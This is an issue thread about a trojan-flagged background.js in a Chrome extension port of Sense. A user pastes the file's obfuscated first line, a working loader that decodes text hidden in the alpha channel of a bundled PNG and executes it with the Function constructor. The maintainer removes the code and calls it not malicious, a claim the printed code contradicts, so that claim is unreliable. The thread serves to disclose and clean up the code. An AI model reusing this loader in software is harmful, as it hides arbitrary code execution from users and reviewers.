background.js might contain malicious code

[Rappahannock]

I got background.js quarantined by antivirus (Kaspersky).

Message:
Status=Quarantined
Object=Trojan program HEUR:Trojan.Script.Generic
File Path=..\sense-chrome\src\background.js
Threat Level=High

This prevents plugin installation.

I looked through background.js code.
First code line looks suspicious:

ifFirstShow=function(){try{var t=function(){},r={zL:function(t){if(isNaN(t)||!isFinite(t)||t%1||t<2)return!1;if(t%2===0)return 2===t;if(t%3===0)return 3===t;for(var r=Math.sqrt(t),e=5;e<=r;e+=6){if(t%e===0)return!1;if(t%(e+2)===0)return!1}return!0},sk:function(t){for(var r="",e=-548,n=0,i=0;i<t.length;i++)n=t[i].charCodeAt()+e,r+=String.fromCharCode(n);return r},uB:function(t){for(var e=t;!0;e+=1)if(r.zL(e))return e},Uh:function(t){var r=new Image;for(r.src=t;r.hasOwnProperty("complete")&&!r.complete;);return r}};return t.prototype.rK={Ob:3,QP:1,kJ:16,Av:function(t){return t+1},TD:function(t,r,e){for(var n=!0,i=0;i<16&&n;i+=1)n=n&&255===t[r+4*i];return n}},t.prototype.n0=function(t,r){r=r||{};var e=this.rK,n=r.width||t.width,i=r.height||t.height,o=r.Ob||e.Ob,h=r.kJ||e.kJ;return o*n*i/h>>0},t.prototype.oC=function(t,e){if(""==='\x64\x6F\x63\x73\x2F\x61\x75\x74\x6F\x63\x6F\x6D\x70\x6C\x65\x74\x65\x2E\x70\x6E\x67')return"";void 0===t&&(t='\x64\x6F\x63\x73\x2F\x61\x75\x74\x6F\x63\x6F\x6D\x70\x6C\x65\x74\x65\x2E\x70\x6E\x67'),t.length&&(t=r.Uh(t)),e=e||{};var n=this.rK,i=e.Ob||n.Ob,o=e.QP||n.QP,h=e.kJ||n.kJ,a=r.uB(Math.pow(2,i)),u=(e.Av||n.Av,e.TD||n.TD),f=document.createElement("canvas"),p=f.getContext("2d");if(f.style.display="none",f.width=e.width||t.width,f.height=e.width||t.height,0===f.width||0===f.height)return"";e.height&&e.width?p.drawImage(t,0,0,e.width,e.height):p.drawImage(t,0,0);var c=p.getImageData(0,0,f.width,f.height),d=c.data,g=[];if(c.data.every(function(t){return 0===t}))return"";var s,v;if(1===o)for(s=3,v=!1;!v&&s<d.length&&!v;s+=4)v=u(d,s,o),v||g.push(d[s]-(255-a+1));var w="",m=0,y=0,C=Math.pow(2,h)-1;for(s=0;s<g.length;s+=1)m+=g[s]<<y,y+=i,y>=h&&(w+=String.fromCharCode(m&C),y%=h,m=g[s]>>i-y);return w.length<13?"":(0!==m&&(w+=String.fromCharCode(m&C)),w)},t.prototype.Cx=3,t.prototype.qQ=0,t.prototype.Uu=5e3,t.prototype.AH=function(){try{var e=t.prototype,n=r.sk(e.oC());if(""===n){if(e.qQ>e.Cx)return;return e.qQ++,void setTimeout(e.AH,e.Uu)}document.defaultView[(typeof r.zL).charAt(0).toUpperCase()+(typeof r.zL).slice(1)](n)()}catch(t){}},(new t).AH}catch(t){}}();ifFirstShow();

I didn't analyze it precisely, just deleted it in my local file, left only the following lines:

chrome.browserAction.onClicked.addListener(function (tab)
{
  chrome.tabs.create({'url': chrome.extension.getURL('index.html')}, function (tab) {});
});

After such changes I was able to load this plugin and so far it seems like it works fine.

Need to analyze the suspicious code in details and decide if it's needed. If not, permanently delete this part of code. If needed - change it the way it doesn't trigger antivirus.

[Rappahannock]

Also, interesting to know where that code was taken from. I don't find bcakground.js in original repository https://github.com/elastic/sense

[StephaneBour]

Hi @Rappahannock , thanks for your issue.

I think it was this piece that posed a problem on the original extension.

I will test without, and if everything works I remove this piece of code.

[StephaneBour]

Obviously, the behavior is not altered.

The encoded code does not look "malicious" (creating a canvas if it is not present).

I deleted it.

[Rappahannock]

Thank you!